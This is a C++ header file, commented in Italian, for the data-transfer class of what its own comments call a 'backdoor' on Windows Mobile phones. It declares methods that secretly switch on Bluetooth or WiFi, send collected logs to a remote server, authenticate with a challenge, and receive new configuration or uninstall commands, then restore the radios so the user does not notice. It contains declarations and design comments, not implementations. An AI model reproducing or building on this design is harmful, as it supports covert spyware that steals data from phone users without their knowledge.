#include "Common.h"
#include "Conf.h"
#include "Log.h"
#include "Rand.h"
#include "WifiPeek.h"
#include <exception>
#include <Winsock2.h>
#include <ws2bth.h>

#include <Bt_api.h>
#include <bthutil.h>
#include <bthapi.h>
#include <initguid.h>
#include <pm.h>

using namespace std;

#ifndef __Transfer_h__
#define __Transfer_h__

#include "Status.h"

class Status;
class Transfer;

class Transfer
{
	/**
	 * TRUE se il BT e' attualmente attivo, FALSE altrimenti.
	 */
	private: BOOL bIsBtActive;

	/**
	 * TRUE se il WiFi e' attualmente attivo, FALSE altrimenti.
	 */
	private: BOOL bIsWifiActive;

	/**
	 * TRUE se il BT e' gia' stato attivato da noi, FALSE altrimenti.
	 */
	private: BOOL bIsBtAlreadyActive;

	/**
	 * TRUE se il WiFi e' gia' stato attivato da noi, FALSE altrimenti.
	 */
	private: BOOL bIsWifiAlreadyActive;

	/**
	 * Contiene lo stato di alimentazione della Wifi
	 */
	private: CEDEVICE_POWER_STATE wifiPower;

	/**
	 * pWifiName contiene il nome dell'adattatore WiFi completo di GUID.
	 * pWifiAdapter contiene soltanto il nome dell'adattatore WiFi.
	 */
	private: WCHAR *pWifiName, *pWifiAdapter;
	
	/**
	* TRUE se e' stata ricevuta una nuova configurazione, FALSE altrimenti.
	*/
	private: BOOL bNewConf;

	/**
	* TRUE se e' stata ricevuta una richiesta di uninstall, FALSE altrimenti.
	*/
	private: BOOL bUninstall;

	/**
	 * Il buffer che contiene il challenge per il controllo del server.
	 */
	private: BYTE Challenge[16];

	/**
	* La GUID utilizzata per trovare il servizio bluetooth
	*/
	private: GUID btGuid;

	/**
	 * L'oggetto WiFi utilizzato per il controllo della rete wireless
	 */
	private: CWifiPeek *wifiObj;

	/**
	 * Struttura che definisce le informazioni sulla backdoor:
	 * 1. Dimensione della struttura in byte
	 * 2. Versione (anno/mese/giorno, 16 byte, 8 Wide chars)
	 * 3. Identificativo univoco per cliente (16 byte)
	 * 4. ID Univoco del client
	 * 5. Orario in epoch time
	 */
	private: struct backDoorInfo;
	private: SOCKET wifiSocket;
	private: SOCKET BTSocket;
	private: SOCKET internetSocket;

	/**
	 * Serve al costruttore per impostare tutte le opzioni che sono presenti nel file di configurazione
	 * e che sono differenti da quelle presenti nelle variabili globali.
	 */
	private: Status *statusObj;

	/**
	 * Tempo in millisecondi per il loop di polling della connessione. E numero di tentativi da fare
	 */
	private: UINT pollInterval;
	private: UINT retryTimes;

	/**
	 * Mac address del server bluetooth
	 */
	private: BT_ADDR uBtMac;

	/**
	* PIN per la connessione bluetooth
	*/
	private: UCHAR BtPin[16];

	private: list<LogInfo> *pSnap;
	protected: Log *log;

	/**
	 * Attiva il dispositivo BT, torna TRUE se l'attivazione e' andata a buon fine, FALSE altrimenti. Questa funzione
	 * deve controllare prima lo stato di bIsBtAlreadyActive per evitare la doppia attivazione e per mantenere
	 * lo stato dell'oggetto coerente con lo stato del telefono.
	 */
	private: BOOL ActivateBT();

	/**
	 * Disattiva il dispositivo BT, torna TRUE se la disattivazione e' andata a buon fine, FALSE altrimenti. Questa
	 * funzione deve controllare lo stato del BT per vedere se e' ancora attivo (l'utente potrebbe averlo 
	 * disattivato), poi deve controllare lo stato di bIsBtAlreadyActive per verificare che il BT non fosse gia' acceso
	 * per conto suo. In caso contrario lo spegne altrimenti lo lascia allo stato originale.
	 */
	private: BOOL DeActivateBT();

	/**
	 * Attiva la connessione WiFi, torna TRUE se l'attivazione e' andata a buon fine, FALSE altrimenti. Questa 
	 * funzione deve controllare prima lo stato di bIsWifiAlreadyActive per evitare la doppia attivazione e per 
	 * mantenere lo stato dell'oggetto coerente con lo stato del telefono.
	 */
	private: BOOL ActivateWiFi();

	/**
	 * Disattiva il dispositivo WiFi, torna TRUE se la disattivazione e' andata a buon fine, FALSE altrimenti. Questa
	 * funzione deve controllare lo stato del Wifi per vedere se e' ancora attivo (l'utente potrebbe averlo 
	 * disattivato), poi deve controllare lo stato di bIsWifiAlreadyActive per verificare che il Wifi non fosse gia' 
	 * acceso per conto suo. In caso contrario lo spegne altrimenti lo lascia allo stato originale.
	 */
	private: BOOL DeActivateWiFi();

	/**
	 * Imposta il PIN per la connessione BT. Torna TRUE se il PIN e' stato impostato correttamente, FALSE altrimenti.
	 */
	private: BOOL SetBTPin(UCHAR *pPin, UINT uLen);

	/**
	 * Torna TRUE se e' disponibile una connessione ad internet attiva, FALSE altrimenti.
	 */
	private: BOOL IsInternetConnectionAvailable();

	private: void MiniSleep(UINT delay);

	/**
	 * Invia tutti i log dalla cartella dei log alla connessione stabilita da Poll(), al termine dell'invio rimuove tutti i log.
	 * Se l'invio e' avvenuto con successo torna TRUE, altrimenti torna FALSE (indica che e' necessario rifare il send).
	 * Il sending funziona in questo modo: per prima cosa si invia la BackDoorInfo struct, si chiama la Recv() e ci
	 * si mette in attesa del comando di configurazione ricevuta. Quindi si invia un log e ci si mette in attesa del
	 * comando di log ricevuto (il comando conterra' il messaggio di OK ed il numero di byte ricevuti, in futuro
	 * dovrebbe contenere un CRC), se il log e' stato ricevuto con successo si rimuove, altrimenti si risenda. Al
	 * termine dell'invio dei log si invia un messaggio di "log terminati". A questo punto si chiama la Recv() e si
	 * resta in attesa di eventuali aggiornamenti, a procedura compiuta si chiude la connessione.
	 */
	private: UINT Send(UINT Type);

	/**
	* Prende una nuova configurazione dal server e la salva nel file di backup.
	* Torna TRUE se la configurazione e' stata ricevuta con successo, FALSE altrimenti.
	*/
	private: BOOL GetNewConf(SOCKET s);

	 /**
	 * Questi metodi attivano le relative interfacce e quindi chiamano la Send() per spedire i log
	 */
	public: UINT BtSend();
	public: UINT WiFiSend();
	public: UINT InternetSend();

	/**
	 * Riceve uno o piu' comandi dal server, ritorna un puntatore ad un buffer contenente i dati, questo buffer va
	 * poi liberato dal chiamante. La funzione prende in input un intero passato per riferimento che conterra' il
	 * numero di byte presente nel buffer. Se la funzione fallisce torna NULL. Questa funzione e' privata perche'
	 * viene chiamata all'interno della Send() al termine del ciclo di invio.
	 */
	private: BYTE* Recv(UINT* len);

	/**
	 * Chiude la connessione al tipo di socket specificato, la documentazione del tipo si trova nella documentazione
	 * dei parametri della funzione. Torna TRUE se la connessione e' stata chiusa con successo, FALSE altrimenti.
	 * Close, se necessario, disattiva il BT o il WiFi.
	 */
	private: BOOL Close(UINT type);

	/**
	 * Imposta nella configurazione il MAC Address che verra' utilizzato per la connessione BT. Torna TRUE se
	 * la nuova impostazione e' stata aggiornata correttamente, FALSE altrimenti.
	 */
	private: BOOL SetBTMacAddress(UINT64 uMacAddress);

	/**
	* Imposta nella configurazione il GUID utilizzato dal servizio BT. Torna TRUE se
	* la nuova impostazione e' stata aggiornata correttamente, FALSE altrimenti.
	*/
	private: BOOL SetBTGuid(GUID gGuid);

	/**
	 * Imposta nella configurazione il nuovo MAC Address che verra' utilizzato per la connessione WiFi. Torna TRUE se
	 * la nuova impostazione e' stata aggiornata correttamente, FALSE altrimenti.
	 */
	private: BOOL SetWifiMacAddress(UINT pMacAddress);

	/**
	 * Imposta nella configurazione il nuovo SSID che verra' utilizzato per la connessione WiFi. Torna TRUE se
	 * la nuova impostazione e' stata aggiornata correttamente, FALSE altrimenti.
	 */
	private: BOOL SetWifiSSID(WCHAR* pSSID);

	/**
	 * Imposta la chiave per la connessione WiFi ed il tipo di connessione (in chiaro, WEP, WPA, WPA2...). Torna
	 * TRUE se la funzione e' andata a buon fine, FALSE altrimenti.
	 */
	private: BOOL SetWifiKey(BYTE* pKey, UINT len, UINT type);

	/**
	* Imposta il tempo di retry per una connessione fallita ed il numero ti tentativi. La funzione torna
	* TRUE se e' andata a buon fine, FALSE altrimenti.
	*/
	private: BOOL SetPollInterval(UINT uPoll, UINT uTimes);

	/**
	* Spedisce un challenge di 16 byte cifrato. La funzione torna
	* TRUE se e' andata a buon fine, FALSE altrimenti.
	*/
	private: BOOL SendChallenge(SOCKET s);

	/**
	* Controlla il challenge. La funzione torna
	* TRUE se e' andata a buon fine, FALSE altrimenti.
	*/
	private: BOOL CheckResponse(SOCKET s);

	/**
	* Prende il challenge dal server, lo cifra e lo spedisce. La funzione torna
	* TRUE se e' andata a buon fine, FALSE altrimenti.
	*/
	private: BOOL GetChallenge(SOCKET s);

	/**
	* Spedisce sul socket s i dati puntati da pData per una lunghezza Len. La funzione torna
	* il numero di byte inviati se e' andata a buon fine, SOCKET_ERROR altrimenti.
	*/
	private: INT SendData(SOCKET s, BYTE *pData, UINT Len);

	/**
	* Riceve dal socket s i dati puntati da pData, Len e' la lunghezza del buffer. La funzione torna
	* il numero di byte ricevuti se e' andata a buon fine, SOCKET_ERROR in caso di fallimento oppure
	* WSAEMSGSIZE se il buffer fornito e' troppo piccolo.
	*/
	private: INT RecvData(SOCKET s, BYTE *pData, UINT Len);

	/**
	* Spedisce sul socket s il comando uCommand. La funzione torna
	* il numero di byte inviati se e' andata a buon fine, SOCKET_ERROR altrimenti.
	*/
	private: INT SendCommand(SOCKET s, UINT uCommand);

	/**
	* Riceve dal socket s un comando composto da 4 byte. La funzione torna
	* il comando se e' andata a buon fine, SOCKET_ERROR altrimenti.
	*/
	private: INT RecvCommand(SOCKET s);

	/**
	* Invia i log. La funzione torna
	* TRUE se e' andata a buon fine, FALSE altrimenti.
	*/
	private: BOOL Sync(SOCKET s);

	/**
	* Cerca sull'indirizzo "address" il servizio con il nostro GUID, torna
	* TRUE se il servizio viene trovato su "address", FALSE altrimenti.
	*/
	private: BOOL InquiryService(WCHAR *address, void *protocolInfo);

	/**
	* Cerca il server bluetooth con il servizio per la sync, torna un mac address 
	* se la funzione torna a buon fine, 0 altrimenti.
	*/
	private: BT_ADDR FindServer(SOCKET bt);

	/**
	 * Costruttore di default, chiama la Status.GetConfStruct() per inizializzare tutte le impostazioni per il polling e
	 * per l'inizializzazione delle connessioni.
	 */
	public:  Transfer();
			 ~Transfer();

	/**
	 * Effettua il polling per vedere se:
	 * 1. E' presente il server BT al quale inviare i dati.
	 * 2. E' presente l'AP WiFi al quale inviare i dati.
	 * 3. E' presente la connessione ad internet.
	 * La connessione viene effettuata direttamente da questa chiamata al primo tipo di connessione disponibile.
	 * La funzione torna 0 se non trova nessuna connessione disponibile. Gli altri valori di ritorno sono cosi'
	 * definiti:
	 * 
	 * #define BLUETOOTH_CONNECTED 1
	 * #define WIFI_CONNECTED 2
	 * #define INTERNET_CONNECTED 3
	 * 
	 * Se la funzione trova, ad esempio, il server bluetooth ma non riesce a collegarsi, invia il valore definito per
	 * quella connessione e negato. Sembra complicato ma non lo e', ad esempio nel caso venga trovato il server
	 * BT ma non si riesca ad effettuare la connessione il risultato sara':
	 * 
	 * return -(BLUETOOTH_CONNECTED);
	 * 
	 * Poll apre la connessione al socket.
	 */
	public: INT Poll(UINT type);
};

#endif
